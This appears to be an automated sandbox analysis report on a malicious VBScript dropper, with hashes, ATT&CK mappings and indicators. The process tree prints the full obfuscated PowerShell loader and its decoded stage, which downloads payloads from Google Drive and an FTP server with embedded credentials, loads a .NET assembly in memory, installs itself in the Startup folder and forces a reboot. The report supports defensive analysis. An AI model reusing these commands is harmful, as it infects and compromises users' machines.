55b6b8489894a7769451a1a45f5662ae2e0f9f1057077643c15699aa43d39eed

General

Target

.vbs
Size

562KB
MD5

5548cba2f4acdafa93152fcec4f27ac8
SHA1

fc3227f824be04c73fa9e864f5bf34676bbcad8c
SHA256

55b6b8489894a7769451a1a45f5662ae2e0f9f1057077643c15699aa43d39eed
SHA512

5fbed2a9a76a798cb057b61a1b895e72da32d93954f368be1b29a89d77e4a8b1e480675b53b95626f04ce937875c716bbd1d6072ebe27e7a2bd3fbf149f3aacf
SSDEEP

1536:kmmmmmmmmmmmmmmmmmmyFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF1:k5oTl

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.vbs	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
536	powershell.exe
2732	powershell.exe
2660	powershell.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	wusa.exe
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	wusa.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
536	powershell.exe
2732	powershell.exe
2688	powershell.exe
2660	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	2732	powershell.exe
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2660	powershell.exe

Suspicious use of WriteProcessMemory 15 IoCs

description	pid	Process	procid_target
PID 1688 wrote to memory of 536	1688	WScript.exe	31
PID 1688 wrote to memory of 536	1688	WScript.exe	31
PID 1688 wrote to memory of 536	1688	WScript.exe	31
PID 536 wrote to memory of 2732	536	powershell.exe	33
PID 536 wrote to memory of 2732	536	powershell.exe	33
PID 536 wrote to memory of 2732	536	powershell.exe	33
PID 2732 wrote to memory of 2688	2732	powershell.exe	34
PID 2732 wrote to memory of 2688	2732	powershell.exe	34
PID 2732 wrote to memory of 2688	2732	powershell.exe	34
PID 2688 wrote to memory of 2676	2688	powershell.exe	35
PID 2688 wrote to memory of 2676	2688	powershell.exe	35
PID 2688 wrote to memory of 2676	2688	powershell.exe	35
PID 2732 wrote to memory of 2660	2732	powershell.exe	36
PID 2732 wrote to memory of 2660	2732	powershell.exe	36
PID 2732 wrote to memory of 2660	2732	powershell.exe	36

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9ҼмẦDsҼмẦKQҼмẦgҼмẦCkҼмẦIҼмẦҼмẦnҼмẦGUҼмẦdQByҼмẦHQҼмẦJwҼмẦgҼмẦCwҼмẦIҼмẦBYҼмẦFҼмẦҼмẦVQB1ҼмẦGgҼмẦJҼмẦҼмẦgҼмẦCwҼмẦIҼмẦҼмẦnҼмẦGgҼмẦdҼмẦB0ҼмẦHҼмẦҼмẦcwҼмẦ6ҼмẦC8ҼмẦLwBlҼмẦHYҼмẦaQByҼмẦHQҼмẦdQBhҼмẦGwҼмẦcwBlҼмẦHIҼмẦdgBpҼмẦGMҼмẦZQBzҼмẦHIҼмẦZQB2ҼмẦGkҼмẦZQB3ҼмẦHMҼмẦLgBjҼмẦG8ҼмẦbQҼмẦvҼмẦHcҼмẦcҼмẦҼмẦtҼмẦGkҼмẦbgBjҼмẦGwҼмẦdQBkҼмẦGUҼмẦcwҼмẦvҼмẦGMҼмẦcwBzҼмẦC8ҼмẦagBwҼмẦC4ҼмẦdҼмẦB4ҼмẦHQҼмẦJwҼмẦgҼмẦCgҼмẦIҼмẦBdҼмẦF0ҼмẦWwB0ҼмẦGMҼмẦZQBqҼмẦGIҼмẦbwBbҼмẦCҼмẦҼмẦLҼмẦҼмẦgҼмẦGwҼмẦbҼмẦB1ҼмẦG4ҼмẦJҼмẦҼмẦgҼмẦCgҼмẦZQBrҼмẦG8ҼмẦdgBuҼмẦEkҼмẦLgҼмẦpҼмẦCҼмẦҼмẦJwBJҼмẦFYҼмẦRgByҼмẦHҼмẦҼмẦJwҼмẦgҼмẦCgҼмẦZҼмẦBvҼмẦGgҼмẦdҼмẦBlҼмẦE0ҼмẦdҼмẦBlҼмẦEcҼмẦLgҼмẦpҼмẦCcҼмẦMQBzҼмẦHMҼмẦYQBsҼмẦEMҼмẦLgҼмẦzҼмẦHkҼмẦcgBhҼмẦHIҼмẦYgBpҼмẦEwҼмẦcwBzҼмẦGEҼмẦbҼмẦBDҼмẦCcҼмẦKҼмẦBlҼмẦHҼмẦҼмẦeQBUҼмẦHQҼмẦZQBHҼмẦC4ҼмẦKQҼмẦgҼмẦFoҼмẦYwBCҼмẦGMҼмẦYQҼмẦkҼмẦCҼмẦҼмẦKҼмẦBkҼмẦGEҼмẦbwBMҼмẦC4ҼмẦbgBpҼмẦGEҼмẦbQBvҼмẦEQҼмẦdҼмẦBuҼмẦGUҼмẦcgByҼмẦHUҼмẦQwҼмẦ6ҼмẦDoҼмẦXQBuҼмẦGkҼмẦYQBtҼмẦG8ҼмẦRҼмẦBwҼмẦHҼмẦҼмẦQQҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦOwҼмẦpҼмẦCҼмẦҼмẦKQҼмẦgҼмẦCcҼмẦQQҼмẦnҼмẦCҼмẦҼмẦLҼмẦҼмẦgҼмẦCcҼмẦkyE6ҼмẦJMhJwҼмẦgҼмẦCgҼмẦZQBjҼмẦGEҼмẦbҼмẦBwҼмẦGUҼмẦUgҼмẦuҼмẦGcҼмẦUwB6ҼмẦEMҼмẦQgBsҼмẦCQҼмẦIҼмẦҼмẦoҼмẦGcҼмẦbgBpҼмẦHIҼмẦdҼмẦBTҼмẦDQҼмẦNgBlҼмẦHMҼмẦYQBCҼмẦG0ҼмẦbwByҼмẦEYҼмẦOgҼмẦ6ҼмẦF0ҼмẦdҼмẦByҼмẦGUҼмẦdgBuҼмẦG8ҼмẦQwҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦWgBjҼмẦEIҼмẦYwBhҼмẦCQҼмẦIҼмẦBdҼмẦF0ҼмẦWwBlҼмẦHQҼмẦeQBCҼмẦFsҼмẦOwҼмẦnҼмẦCUҼмẦSQBoҼмẦHEҼмẦUgBYҼмẦCUҼмẦJwҼмẦgҼмẦD0ҼмẦIҼмẦBYҼмẦFҼмẦҼмẦVQB1ҼмẦGgҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦIҼмẦBnҼмẦFMҼмẦegBDҼмẦEIҼмẦbҼмẦҼмẦkҼмẦCҼмẦҼмẦKҼмẦBnҼмẦG4ҼмẦaQByҼмẦHQҼмẦUwBkҼмẦGEҼмẦbwBsҼмẦG4ҼмẦdwBvҼмẦEQҼмẦLgB1ҼмẦHkҼмẦYwBmҼмẦCQҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦZwBTҼмẦHoҼмẦQwBCҼмẦGwҼмẦJҼмẦҼмẦ7ҼмẦDgҼмẦRgBUҼмẦFUҼмẦOgҼмẦ6ҼмẦF0ҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦdҼмẦB4ҼмẦGUҼмẦVҼмẦҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦdQB5ҼмẦGMҼмẦZgҼмẦkҼмẦDsҼмẦKQB0ҼмẦG4ҼмẦZQBpҼмẦGwҼмẦQwBiҼмẦGUҼмẦVwҼмẦuҼмẦHQҼмẦZQBOҼмẦCҼмẦҼмẦdҼмẦBjҼмẦGUҼмẦagBiҼмẦE8ҼмẦLQB3ҼмẦGUҼмẦTgҼмẦoҼмẦCҼмẦҼмẦPQҼмẦgҼмẦHUҼмẦeQBjҼмẦGYҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦKҼмẦBlҼмẦHMҼмẦbwBwҼмẦHMҼмẦaQBkҼмẦC4ҼмẦdQB5ҼмẦGMҼмẦZgҼмẦkҼмẦDsҼмẦKQҼмẦgҼмẦCcҼмẦdҼмẦB4ҼмẦHQҼмẦLgҼмẦxҼмẦDҼмẦҼмẦTҼмẦBMҼмẦEQҼмẦLwҼмẦxҼмẦDҼмẦҼмẦLwByҼмẦGUҼмẦdҼмẦBwҼмẦHkҼмẦcgBjҼмẦHҼмẦҼмẦVQҼмẦvҼмẦHIҼмẦYgҼмẦuҼмẦG0ҼмẦbwBjҼмẦC4ҼмẦdҼмẦBhҼмẦHIҼмẦYgB2ҼмẦGsҼмẦYwBzҼмẦGUҼмẦZҼмẦҼмẦuҼмẦHҼмẦҼмẦdҼмẦBmҼмẦEҼмẦҼмẦMQB0ҼмẦGEҼмẦcgBiҼмẦHYҼмẦawBjҼмẦHMҼмẦZQBkҼмẦC8ҼмẦLwҼмẦ6ҼмẦHҼмẦҼмẦdҼмẦBmҼмẦCcҼмẦIҼмẦҼмẦoҼмẦGcҼмẦbgBpҼмẦHIҼмẦdҼмẦBTҼмẦGQҼмẦYQBvҼмẦGwҼмẦbgB3ҼмẦG8ҼмẦRҼмẦҼмẦuҼмẦHUҼмẦeQBjҼмẦGYҼмẦJҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦBnҼмẦFMҼмẦegBDҼмẦEIҼмẦbҼмẦҼмẦkҼмẦDsҼмẦKQҼмẦnҼмẦEҼмẦҼмẦQҼмẦBwҼмẦEoҼмẦOҼмẦҼмẦ3ҼмẦDUҼмẦMQҼмẦyҼмẦG8ҼмẦcgBwҼмẦHIҼмẦZQBwҼмẦG8ҼмẦbҼмẦBlҼмẦHYҼмẦZQBkҼмẦCcҼмẦLҼмẦҼмẦpҼмẦCkҼмẦOQҼмẦ0ҼмẦCwҼмẦNgҼмẦxҼмẦDEҼмẦLҼмẦҼмẦ3ҼмẦDkҼмẦLҼмẦҼмẦ0ҼмẦDEҼмẦMQҼмẦsҼмẦDgҼмẦOQҼмẦsҼмẦDgҼмẦMQҼмẦxҼмẦCwҼмẦNwҼмẦwҼмẦDEҼмẦLҼмẦҼмẦ5ҼмẦDkҼмẦLҼмẦҼмẦ1ҼмẦDEҼмẦMQҼмẦsҼмẦDEҼмẦMҼмẦҼмẦxҼмẦCwҼмẦMҼмẦҼмẦwҼмẦDEҼмẦKҼмẦBdҼмẦF0ҼмẦWwByҼмẦGEҼмẦaҼмẦBjҼмẦFsҼмẦIҼмẦBuҼмẦGkҼмẦbwBqҼмẦC0ҼмẦKҼмẦҼмẦoҼмẦGwҼмẦYQBpҼмẦHQҼмẦbgBlҼмẦGQҼмẦZQByҼмẦEMҼмẦawByҼмẦG8ҼмẦdwB0ҼмẦGUҼмẦTgҼмẦuҼмẦHQҼмẦZQBOҼмẦC4ҼмẦbQBlҼмẦHQҼмẦcwB5ҼмẦFMҼмẦIҼмẦB0ҼмẦGMҼмẦZQBqҼмẦGIҼмẦbwҼмẦtҼмẦHcҼмẦZQBuҼмẦCҼмẦҼмẦPQҼмẦgҼмẦHMҼмẦbҼмẦBhҼмẦGkҼмẦdҼмẦBuҼмẦGUҼмẦZҼмẦBlҼмẦHIҼмẦQwҼмẦuҼмẦHUҼмẦeQBjҼмẦGYҼмẦJҼмẦҼмẦ7ҼмẦDgҼмẦRgBUҼмẦFUҼмẦOgҼмẦ6ҼмẦF0ҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦdҼмẦB4ҼмẦGUҼмẦVҼмẦҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦZwBuҼмẦGkҼмẦZҼмẦBvҼмẦGMҼмẦbgBFҼмẦC4ҼмẦdQB5ҼмẦGMҼмẦZgҼмẦkҼмẦDsҼмẦKQB0ҼмẦG4ҼмẦZQBpҼмẦGwҼмẦQwBiҼмẦGUҼмẦVwҼмẦuҼмẦHQҼмẦZQBOҼмẦCҼмẦҼмẦdҼмẦBjҼмẦGUҼмẦagBiҼмẦE8ҼмẦLQB3ҼмẦGUҼмẦTgҼмẦoҼмẦCҼмẦҼмẦPQҼмẦgҼмẦHUҼмẦeQBjҼмẦGYҼмẦJҼмẦҼмẦ7ҼмẦGcҼмẦUwB6ҼмẦEMҼмẦQgBsҼмẦCQҼмẦOwҼмẦyҼмẦDEҼмẦcwBsҼмẦFQҼмẦOgҼмẦ6ҼмẦF0ҼмẦZQBwҼмẦHkҼмẦVҼмẦBsҼмẦG8ҼмẦYwBvҼмẦHQҼмẦbwByҼмẦFҼмẦҼмẦeQB0ҼмẦGkҼмẦcgB1ҼмẦGMҼмẦZQBTҼмẦC4ҼмẦdҼмẦBlҼмẦE4ҼмẦLgBtҼмẦGUҼмẦdҼмẦBzҼмẦHkҼмẦUwBbҼмẦCҼмẦҼмẦPQҼмẦgҼмẦGwҼмẦbwBjҼмẦG8ҼмẦdҼмẦBvҼмẦHIҼмẦUҼмẦB5ҼмẦHQҼмẦaQByҼмẦHUҼмẦYwBlҼмẦFMҼмẦOgҼмẦ6ҼмẦF0ҼмẦcgBlҼмẦGcҼмẦYQBuҼмẦGEҼмẦTQB0ҼмẦG4ҼмẦaQBvҼмẦFҼмẦҼмẦZQBjҼмẦGkҼмẦdgByҼмẦGUҼмẦUwҼмẦuҼмẦHQҼмẦZQBOҼмẦC4ҼмẦbQBlҼмẦHQҼмẦcwB5ҼмẦFMҼмẦWwҼмẦ7ҼмẦH0ҼмẦZQB1ҼмẦHIҼмẦdҼмẦҼмẦkҼмẦHsҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦawBjҼмẦGEҼмẦYgBsҼмẦGwҼмẦYQBDҼмẦG4ҼмẦbwBpҼмẦHQҼмẦYQBkҼмẦGkҼмẦbҼмẦBhҼмẦFYҼмẦZQB0ҼмẦGEҼмẦYwBpҼмẦGYҼмẦaQB0ҼмẦHIҼмẦZQBDҼмẦHIҼмẦZQB2ҼмẦHIҼмẦZQBTҼмẦDoҼмẦOgBdҼмẦHIҼмẦZQBnҼмẦGEҼмẦbgBhҼмẦE0ҼмẦdҼмẦBuҼмẦGkҼмẦbwBQҼмẦGUҼмẦYwBpҼмẦHYҼмẦcgBlҼмẦFMҼмẦLgB0ҼмẦGUҼмẦTgҼмẦuҼмẦG0ҼмẦZQB0ҼмẦHMҼмẦeQBTҼмẦFsҼмẦewҼмẦgҼмẦGUҼмẦcwBsҼмẦGUҼмẦfQҼмẦgҼмẦGYҼмẦLwҼмẦgҼмẦDҼмẦҼмẦIҼмẦB0ҼмẦC8ҼмẦIҼмẦByҼмẦC8ҼмẦIҼмẦBlҼмẦHgҼмẦZQҼмẦuҼмẦG4ҼмẦdwBvҼмẦGQҼмẦdҼмẦB1ҼмẦGgҼмẦcwҼмẦgҼмẦDsҼмẦJwҼмẦwҼмẦDgҼмẦMQҼмẦgҼмẦHҼмẦҼмẦZQBlҼмẦGwҼмẦcwҼмẦnҼмẦCҼмẦҼмẦZҼмẦBuҼмẦGEҼмẦbQBtҼмẦG8ҼмẦYwҼмẦtҼмẦCҼмẦҼмẦZQB4ҼмẦGUҼмẦLgBsҼмẦGwҼмẦZQBoҼмẦHMҼмẦcgBlҼмẦHcҼмẦbwBwҼмẦDsҼмẦIҼмẦBlҼмẦGMҼмẦcgBvҼмẦGYҼмẦLQҼмẦgҼмẦCkҼмẦIҼмẦҼмẦnҼмẦHҼмẦҼмẦdQB0ҼмẦHIҼмẦYQB0ҼмẦFMҼмẦXҼмẦBzҼмẦG0ҼмẦYQByҼмẦGcҼмẦbwByҼмẦFҼмẦҼмẦXҼмẦB1ҼмẦG4ҼмẦZQBNҼмẦCҼмẦҼмẦdҼмẦByҼмẦGEҼмẦdҼмẦBTҼмẦFwҼмẦcwB3ҼмẦG8ҼмẦZҼмẦBuҼмẦGkҼмẦVwBcҼмẦHQҼмẦZgBvҼмẦHMҼмẦbwByҼмẦGMҼмẦaQBNҼмẦFwҼмẦZwBuҼмẦGkҼмẦbQBhҼмẦG8ҼмẦUgBcҼмẦGEҼмẦdҼмẦBhҼмẦEQҼмẦcҼмẦBwҼмẦEEҼмẦXҼмẦҼмẦnҼмẦCҼмẦҼмẦKwҼмẦgҼмẦFoҼмẦSwBuҼмẦFkҼмẦTQҼмẦkҼмẦCҼмẦҼмẦKҼмẦҼмẦgҼмẦG4ҼмẦbwBpҼмẦHQҼмẦYQBuҼмẦGkҼмẦdҼмẦBzҼмẦGUҼмẦRҼмẦҼмẦtҼмẦCҼмẦҼмẦJwҼмẦlҼмẦEkҼмẦaҼмẦBxҼмẦFIҼмẦWҼмẦҼмẦlҼмẦCcҼмẦIҼмẦBtҼмẦGUҼмẦdҼмẦBJҼмẦC0ҼмẦeQBwҼмẦG8ҼмẦQwҼмẦgҼмẦDsҼмẦIҼмẦB0ҼмẦHIҼмẦYQB0ҼмẦHMҼмẦZQByҼмẦG8ҼмẦbgҼмẦvҼмẦCҼмẦҼмẦdҼмẦBlҼмẦGkҼмẦdQBxҼмẦC8ҼмẦIҼмẦBHҼмẦGMҼмẦVwBpҼмẦFIҼмẦIҼмẦBlҼмẦHgҼмẦZQҼмẦuҼмẦGEҼмẦcwB1ҼмẦHcҼмẦIҼмẦBlҼмẦHgҼмẦZQҼмẦuҼмẦGwҼмẦbҼмẦBlҼмẦGgҼмẦcwByҼмẦGUҼмẦdwBvҼмẦHҼмẦҼмẦIҼмẦҼмẦ7ҼмẦCkҼмẦJwB1ҼмẦHMҼмẦbQҼмẦuҼмẦG4ҼмẦaQB3ҼмẦHҼмẦҼмẦVQBcҼмẦCcҼмẦIҼмẦҼмẦrҼмẦCҼмẦҼмẦTgBKҼмẦFQҼмẦeҼмẦBEҼмẦCQҼмẦKҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦBHҼмẦGMҼмẦVwBpҼмẦFIҼмẦOwҼмẦpҼмẦCҼмẦҼмẦZQBtҼмẦGEҼмẦTgByҼмẦGUҼмẦcwBVҼмẦDoҼмẦOgBdҼмẦHQҼмẦbgBlҼмẦG0ҼмẦbgBvҼмẦHIҼмẦaQB2ҼмẦG4ҼмẦRQBbҼмẦCҼмẦҼмẦKwҼмẦgҼмẦCcҼмẦXҼмẦBzҼмẦHIҼмẦZQBzҼмẦFUҼмẦXҼмẦҼмẦ6ҼмẦEMҼмẦJwҼмẦoҼмẦCҼмẦҼмẦPQҼмẦgҼмẦFoҼмẦSwBuҼмẦFkҼмẦTQҼмẦkҼмẦDsҼмẦKQҼмẦnҼмẦHUҼмẦcwBtҼмẦC4ҼмẦbgBpҼмẦHcҼмẦcҼмẦBVҼмẦFwҼмẦJwҼмẦgҼмẦCsҼмẦIҼмẦBOҼмẦEoҼмẦVҼмẦB4ҼмẦEQҼмẦJҼмẦҼмẦgҼмẦCwҼмẦQgBLҼмẦEwҼмẦUgBVҼмẦCQҼмẦKҼмẦBlҼмẦGwҼмẦaQBGҼмẦGQҼмẦYQBvҼмẦGwҼмẦbgB3ҼмẦG8ҼмẦRҼмẦҼмẦuҼмẦHMҼмẦdҼмẦBtҼмẦG8ҼмẦbwҼмẦkҼмẦDsҼмẦOҼмẦBGҼмẦFQҼмẦVQҼмẦ6ҼмẦDoҼмẦXQBnҼмẦG4ҼмẦaQBkҼмẦG8ҼмẦYwBuҼмẦEUҼмẦLgB0ҼмẦHgҼмẦZQBUҼмẦC4ҼмẦbQBlҼмẦHQҼмẦcwB5ҼмẦFMҼмẦWwҼмẦgҼмẦD0ҼмẦIҼмẦBnҼмẦG4ҼмẦaQBkҼмẦG8ҼмẦYwBuҼмẦEUҼмẦLgBzҼмẦHQҼмẦbQBvҼмẦG8ҼмẦJҼмẦҼмẦ7ҼмẦCkҼмẦdҼмẦBuҼмẦGUҼмẦaQBsҼмẦEMҼмẦYgBlҼмẦFcҼмẦLgB0ҼмẦGUҼмẦTgҼмẦgҼмẦHQҼмẦYwBlҼмẦGoҼмẦYgBPҼмẦC0ҼмẦdwBlҼмẦE4ҼмẦKҼмẦҼмẦgҼмẦD0ҼмẦIҼмẦBzҼмẦHQҼмẦbQBvҼмẦG8ҼмẦJҼмẦҼмẦ7ҼмẦH0ҼмẦOwҼмẦgҼмẦCkҼмẦJwB0ҼмẦE8ҼмẦTҼмẦBjҼмẦF8ҼмẦSwBhҼмẦDMҼмẦWgBmҼмẦG8ҼмẦWҼмẦҼмẦyҼмẦEoҼмẦSgByҼмẦFYҼмẦaҼмẦBtҼмẦFYҼмẦOQBjҼмẦG0ҼмẦOQBYҼмẦHMҼмẦdQBYҼмẦG0ҼмẦagҼмẦxҼмẦGcҼмẦMQҼмẦnҼмẦCҼмẦҼмẦKwҼмẦgҼмẦG8ҼмẦeҼмẦBLҼмẦFUҼмẦZwҼмẦkҼмẦCgҼмẦIҼмẦҼмẦ9ҼмẦCҼмẦҼмẦbwB4ҼмẦEsҼмẦVQBnҼмẦCQҼмẦewҼмẦgҼмẦGUҼмẦcwBsҼмẦGUҼмẦfQҼмẦ7ҼмẦCҼмẦҼмẦKQҼмẦnҼмẦDIҼмẦNҼмẦB1ҼмẦFgҼмẦSgBUҼмẦHEҼмẦYQBtҼмẦGcҼмẦeQBNҼмẦHQҼмẦRgB6ҼмẦGEҼмẦawBQҼмẦFIҼмẦMQBxҼмẦF8ҼмẦSQB2ҼмẦEcҼмẦaQBYҼмẦE4ҼмẦZҼмẦBxҼмẦGEҼмẦTgҼмẦxҼмẦCcҼмẦIҼмẦҼмẦrҼмẦCҼмẦҼмẦbwB4ҼмẦEsҼмẦVQBnҼмẦCQҼмẦKҼмẦҼмẦgҼмẦD0AIABvAHgASwBVAGcAJAB7ACAAKQAgAHUATgBDAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcwBuAGkAYQB0AG4AbwBDAC4ARQBSAFUAVABDAEUAVABJAEgAQwBSAEEAXwBSAE8AUwBTAEUAQwBPAFIAUAA6AHYAbgBlACQAIAA9ACAAdQBOAEMAVgBxACQAOwAnAD0AZABpACYAZABhAG8AbABuAHcAbwBkAD0AdAByAG8AcAB4AGUAPwBjAHUALwBtAG8AYwAuAGUAbABnAG8AbwBnAC4AZQB2AGkAcgBkAC8ALwA6AHMAcAB0AHQAaAAnACAAPQAgAG8AeABLAFUAZwAkADsAKQAgACcAdQBzAG0ALgBuAGkAdwBwAFUAXAAnACAAKwAgAE4ASgBUAHgARAAkACAAKAAgAGwAZQBkADsAKQAoAGgAdABhAFAAcABtAGUAVAB0AGUARwA6ADoAXQBoAHQAYQBQAC4ATwBJAC4AbQBlAHQAcwB5AFMAWwAgAD0AIABOAEoAVAB4AEQAJAB7ACAAKQAgAGQAdgBvAGYAWAAkACAAKAAgAGYAaQA7ACAAKQAyACgAcwBsAGEAdQBxAEUALgByAG8AagBhAE0ALgBuAG8AaQBzAHIAZQBWAC4AdABzAG8AaAAkACAAPQAgAGQAdgBvAGYAWAAkACAAOwA=';$kahlN = $qKKzc.replace('ҼмẦ' , 'A') ;$DLOWx = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $kahlN ) ); $DLOWx = $DLOWx[-1..-$DLOWx.Length] -join '';$DLOWx = $DLOWx.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\.vbs');powershell $DLOWx
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $Xfovd = $host.Version.Major.Equals(2) ;if ( $Xfovd ) {$DxTJN = [System.IO.Path]::GetTempPath();del ( $DxTJN + '\Upwin.msu' );$gUKxo = 'https://drive.google.com/uc?export=download&id=';$qVCNu = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVCNu ) {$gUKxo = ($gUKxo + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$gUKxo = ($gUKxo + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$oomts = (New-Object Net.WebClient);$oomts.Encoding = [System.Text.Encoding]::UTF8;$oomts.DownloadFile($URLKB, $DxTJN + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($DxTJN + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$fcyu = (New-Object Net.WebClient);$fcyu.Encoding = [System.Text.Encoding]::UTF8;$fcyu.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $fcyu.DownloadString( 'ftp://[email protected]/Upcrypter/01/DLL01.txt' );$fcyu.dispose();$fcyu = (New-Object Net.WebClient);$fcyu.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $fcyu.DownloadString( $lBCzSg );$huUPX = 'C:\Users\Admin\AppData\Local\Temp\.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '↓:↓' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.pj/ssc/sedulcni-pw/moc.sweiversecivreslautrive//:sptth' , $huUPX , 'true' ) );};"
    3⤵
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2732
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe RiWcG /quiet /norestart
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2688
    - - C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" RiWcG /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:2676
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2660

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
6596e2fea5151ad283ffbef3eb206e7a

SHA1
088f66f47a94c1059c03facec24b1aabae28dde9

SHA256
32636cf8d967af6542fc022f1b45ac9ec358b8473eca058c39af24083402a316

SHA512
805eb7cb936511fde866e15b61df9349b4fe847ace8aadd31c23b8736a415e656eb2e7c1d59df27f62e2e4b32fe7e2c9fbf7368169d5f97480bbd60a06bbd22f

Download Submit
memory/536-4-0x000007FEF628E000-0x000007FEF628F000-memory.dmp

Filesize
4KB

Download
memory/536-5-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download
memory/536-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

Filesize
32KB

Download
memory/536-12-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download
memory/536-25-0x000007FEF5FD0000-0x000007FEF696D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing